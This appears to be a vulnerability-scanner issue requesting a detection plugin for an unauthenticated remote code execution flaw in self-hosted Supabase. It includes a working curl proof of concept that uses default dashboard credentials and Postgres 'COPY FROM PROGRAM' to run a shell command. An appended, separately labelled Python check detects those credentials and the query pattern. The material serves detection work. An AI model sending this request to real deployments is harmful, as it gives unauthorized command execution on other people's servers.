Status: Open
Labels: Contributor main (the main issue a contributor is working on, top of the contribution queue), PRP:Accepted, templated
Description
- Identifier of the vulnerability: None
- Affected software: supabase
- Type of vulnerability: RCE
- Requires authentication: No
- Language you would use for writing the plugin: Templated plugins
- Resources: https://supabase.com/docs/guides/self-hosting/docker#installing-and-running-supabase
We can spin up an instance quickly:
git clone https://github.com/supabase/supabase
pushd supabase
git checkout d83ef08ea1aa661ead1af970a094c512319863f8
popd
mkdir supabase-project
cp -rf supabase/docker/* supabase-project
cp supabase/docker/.env.example supabase-project/.env
cd supabase-project
docker compose pull
docker compose up
and then run the following command:
curl 'http://127.0.0.1:8000/api/platform/pg-meta/default/query?key=' \
-X POST \
-H 'content-type: application/json' \
-H 'x-connection-encrypted: ' \
-H 'Authorization: Basic c3VwYWJhc2U6dGhpc19wYXNzd29yZF9pc19pbnNlY3VyZV9hbmRfc2hvdWxkX2JlX3VwZGF0ZWQ=' \
--data-raw $'{"query":"CREATE TABLE filelist (filename text);\\nCOPY filelist FROM PROGRAM \'uname -a\';\\nSELECT * FROM filelist;","disable_statement_timeout":true}'
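As an added defensive check (not code from the issue or from the Supabase project): it decodes the Basic header of the curl above to recover the username:password pair it carries, compares that pair with the DASHBOARD_USERNAME/DASHBOARD_PASSWORD values of a .env file so an operator can tell whether a self-hosted deployment still runs with that pair, and flags pg-meta query bodies that contain COPY ... FROM PROGRAM so they can be alerted on. The DASHBOARD_* key names, the .env excerpt and the sample request body are assumptions/constructed, not taken from the page.

```python
import base64
import json
import re

# Basic header copied from the curl command in the issue; decoded below to
# recover the username:password pair it carries.
ISSUE_BASIC_HEADER = "Basic c3VwYWJhc2U6dGhpc19wYXNzd29yZF9pc19pbnNlY3VyZV9hbmRfc2hvdWxkX2JlX3VwZGF0ZWQ="
# Constructed .env excerpt in the KEY=VALUE form of docker/.env.example; the
# DASHBOARD_* key names are an assumption about where the Basic pair is set.
SAMPLE_ENV = """\
DASHBOARD_USERNAME=supabase
DASHBOARD_PASSWORD=this_password_is_insecure_and_should_be_updated
"""
# Constructed request body in the shape the issue's curl sends to the query endpoint.
SAMPLE_BODY = json.dumps({"query": "CREATE TABLE t (x text);\nCOPY t FROM PROGRAM 'id';", "disable_statement_timeout": True})
COPY_FROM_PROGRAM = re.compile(r"\bCOPY\b.*?\bFROM\s+PROGRAM\b", re.IGNORECASE | re.DOTALL)


def decode_basic(header: str) -> tuple[str, str]:
    """Return (user, password) from an HTTP Basic Authorization header value."""
    scheme, _, blob = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic header")
    user, _, password = base64.b64decode(blob).decode().partition(":")
    return user, password


def parse_env(text: str) -> dict[str, str]:
    """Minimal KEY=VALUE parser for a docker .env file; comments and blanks skipped."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip("\"'")
    return env


def dashboard_uses_known_creds(env_text: str, known_header: str = ISSUE_BASIC_HEADER) -> bool:
    """True if the deployment's dashboard pair equals the pair carried by the known header."""
    env = parse_env(env_text)
    return (env.get("DASHBOARD_USERNAME"), env.get("DASHBOARD_PASSWORD")) == decode_basic(known_header)


def query_invokes_program(body: str) -> bool:
    """True if a pg-meta query JSON body asks Postgres to run COPY ... FROM PROGRAM."""
    try:
        query = json.loads(body).get("query", "")
    except (ValueError, AttributeError):
        return False  # not JSON, or not a JSON object: nothing to inspect
    return isinstance(query, str) and bool(COPY_FROM_PROGRAM.search(query))
```

Run dashboard_uses_known_creds over the real supabase-project/.env to verify the pair was changed before exposing the stack, and query_invokes_program over captured bodies for the query endpoint to detect this pattern.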